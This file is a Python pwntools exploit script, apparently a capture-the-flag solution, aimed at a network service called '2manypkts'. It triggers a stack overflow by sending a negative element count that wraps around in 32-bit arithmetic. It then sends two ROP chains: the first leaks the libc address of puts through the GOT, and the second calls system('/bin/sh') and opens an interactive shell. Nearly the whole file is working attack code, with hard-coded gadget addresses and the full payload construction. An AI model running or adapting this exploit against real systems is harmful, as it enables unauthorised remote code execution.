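#!/usr/bin/env python3
"""Stack-overflow -> ROP exploit for the "2manypkts" service.

Two rounds of the service's "int" command are driven (see ``_send_overflow``):

1. overflow with a chain that calls ``puts(GOT[puts])`` and returns to
   ``main`` -> leaks the libc address of ``puts``;
2. overflow again with ``system("/bin/sh")`` built on the leaked libc base.

All text-segment addresses (gadget, PLT/GOT, main) are hard-coded for this
build of ``./2manypkts``; the 0x40xxxx range suggests a non-PIE binary.  The
libc symbol offsets come from whichever ``libc.so.6`` is loaded below, so the
remote run only works if ``./libc.so.6`` really is the remote libc.

Only the module-level constants, the two chain builders and
``compute_overflow_size`` are meant to be reused; everything else is the
scripted interaction and runs at import time.
"""
import socket
import subprocess
import time
import random

from pwn import *

# Element count of the target's stack buffer (the filler is BUFFER_SIZE
# 4-byte ints, i.e. 14336 * 4 bytes).
BUFFER_SIZE = 14336
context.log_level = 'debug'


def attach_gdb():
    """preexec_fn hook for ``process()``: attach gdb to the child before exec.

    Runs in the forked child: it opens gdb on the child's pid in a new
    terminal, then SIGSTOPs itself so gdb has a quiescent process to attach
    to.  The gdb script catches the upcoming ``exec`` and resumes, which is
    why SIGSTOP is first ignored and then re-enabled for later breakpoints.
    Add ``-ex "b realloc"`` style breakpoints to ``gdb_commands`` as needed.

    The terminal command is passed as an argv list, so no shell quoting of
    the gdb commands is involved.
    """
    import os
    import signal

    gdb_commands = [
        "tcatch exec",
        "handle SIGSTOP nostop",
        "continue",
        "handle SIGSTOP stop",
        "continue",
    ]
    argv = ["urxvtc", "-e", "gdb", "-p", str(os.getpid())]
    for cmd in gdb_commands:
        argv += ["-ex", cmd]
    # Blocks until the terminal client returns (urxvtc hands off to the
    # daemon almost immediately), mirroring the previous os.system() call.
    subprocess.run(argv)
    os.kill(os.getpid(), signal.SIGSTOP)


# Set to 1 to run against a local copy of the binary with the system libc.
LOCAL = 0
if LOCAL:
    libc = ELF("/lib64/libc.so.6")
    # p = process("./2manypkts", preexec_fn=attach_gdb)
    p = process("./2manypkts")
else:
    host = "203.0.113.1"
    port = 30303
    libc = ELF("./libc.so.6")
    # Connect through a userspace TUN helper rather than pwntools' remote().
    # NOTE(review): because this is a process(), ``p.sock`` is None and the
    # TCP_CORK handling in _send_overflow is a no-op; the ~57 KiB payload may
    # therefore be split over many TCP segments.  If the service counts
    # segments (as its name hints), prefer ``p = remote(host, port)`` so the
    # cork takes effect.
    p = process(["/home/wgh/go/bin/tun_tcp_connect", "lol0", "10.1.1.2",
                 str(random.randint(20000, 0xFFFF)), host, str(port)],
                stderr=None)
    # p = remote(host, str(port))

# Offset of a "/bin/sh" string inside libc; bytes pattern as ELF.search expects.
bin_sh_offset = next(libc.search(b"/bin/sh\0"))

# Unused; kept for reference ("double-sized (8 bytes)" element variant).
EXTRA_ELEMENTS = 1

# Binary-specific addresses (non-PIE build of ./2manypkts).
POP_RDI_RET = 0x0000000000403663  # pop rdi ; ret
PUTS_GOT = 0x605048               # GOT slot holding libc puts
PUTS_PLT = 0x400C10               # puts@plt
MAIN_ADDR = 0x400E36              # main, used to restart the service loop


def compute_overflow_size(size, type_size):
    """Return the element count to send so the service reads ``size`` bytes.

    ``INT_MIN + size // type_size``: a negative count that, multiplied by
    ``type_size`` in 32-bit arithmetic, wraps to exactly ``size`` because
    ``INT_MIN * type_size`` is a multiple of 2**32 for type sizes 2, 4, 8.
    Presumably the target checks the signed count against its buffer size
    but sizes the copy with the wrapped product -- TODO confirm against the
    binary.  Integer division keeps the result an int under Python 3 (the
    previous ``/`` produced a float); the callers always pass a ``size``
    that is a multiple of ``type_size``.
    """
    INT_MIN = -(2 ** 31)
    return INT_MIN + size // type_size


def get_rop_chain1():
    """Chain 1: ``puts(GOT[puts])`` then return to ``main`` for a second round."""
    return b"".join([
        p64(POP_RDI_RET),
        p64(PUTS_GOT),   # rdi = &GOT[puts]
        p64(PUTS_PLT),   # puts(rdi) -> prints the libc address of puts
        p64(MAIN_ADDR),  # restart main so we can overflow again
    ])


def get_rop_chain2(base):
    """Chain 2: ``system("/bin/sh")`` with ``base`` = leaked libc load address."""
    return b"".join([
        p64(POP_RDI_RET),
        p64(base + bin_sh_offset),          # rdi = "/bin/sh"
        p64(base + libc.symbols['system']), # system(rdi)
        p64(MAIN_ADDR),                     # not reached in practice
    ])


def _send_overflow(chain, cork):
    """Drive one "int" round: negative size, filler, saved regs, ROP chain.

    Layout after the ``BUFFER_SIZE`` ints of filler: three zero qwords and
    ``0xdeadbeef`` (presumably saved callee registers / rbp -- verify with
    gdb), then ``chain`` lands on the saved return address.

    With ``cork`` set and a real socket available (``p.sock``), TCP_CORK is
    held around the send so the payload goes out in as few segments as
    possible; the cork is always released, even if the send fails.
    """
    n_bytes = BUFFER_SIZE * 4 + 8 + 8 + 8 + 8 + len(chain)
    p.sendline("int")
    p.recvuntil("enter into int")
    p.sendline("%d" % compute_overflow_size(n_bytes, 4))
    p.recvuntil("size :")

    payload = b"A" * (BUFFER_SIZE * 4) + p64(0) * 3 + p64(0xdeadbeef) + chain
    sock = getattr(p, "sock", None) if cork else None
    if sock:
        sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_CORK, True)
    try:
        p.send(payload)
    finally:
        if sock:
            sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_CORK, False)

    p.recvuntil("End data dump")
    p.sendline("exit")
    p.recvuntil("Exiting now!\n")


# Round 1: leak puts.  The original script corked only this round.
time.sleep(1)
_send_overflow(get_rop_chain1(), cork=True)

# puts() prints the 6 significant bytes of the address and stops at the first
# NUL; a libc address with a NUL in its low 6 bytes would truncate the leak.
leaked_puts = u64(p.recv(6) + b'\0\0')
libc_base = leaked_puts - libc.symbols['puts']
log.info("Leaked puts: %016x", leaked_puts)
log.info("Libc base: %016x", libc_base)
# Shared objects are mapped page-aligned: a misaligned base means the leak
# is garbage or ./libc.so.6 is not the remote libc.  log.error() raises.
if libc_base & 0xFFF:
    log.error("libc base %016x is not page aligned: bad leak or wrong libc", libc_base)

# Round 2: system("/bin/sh").  cork=False mirrors the original script; if the
# service is sensitive to segment count, cork=True is the safer choice.
_send_overflow(get_rop_chain2(libc_base), cork=False)
p.interactive()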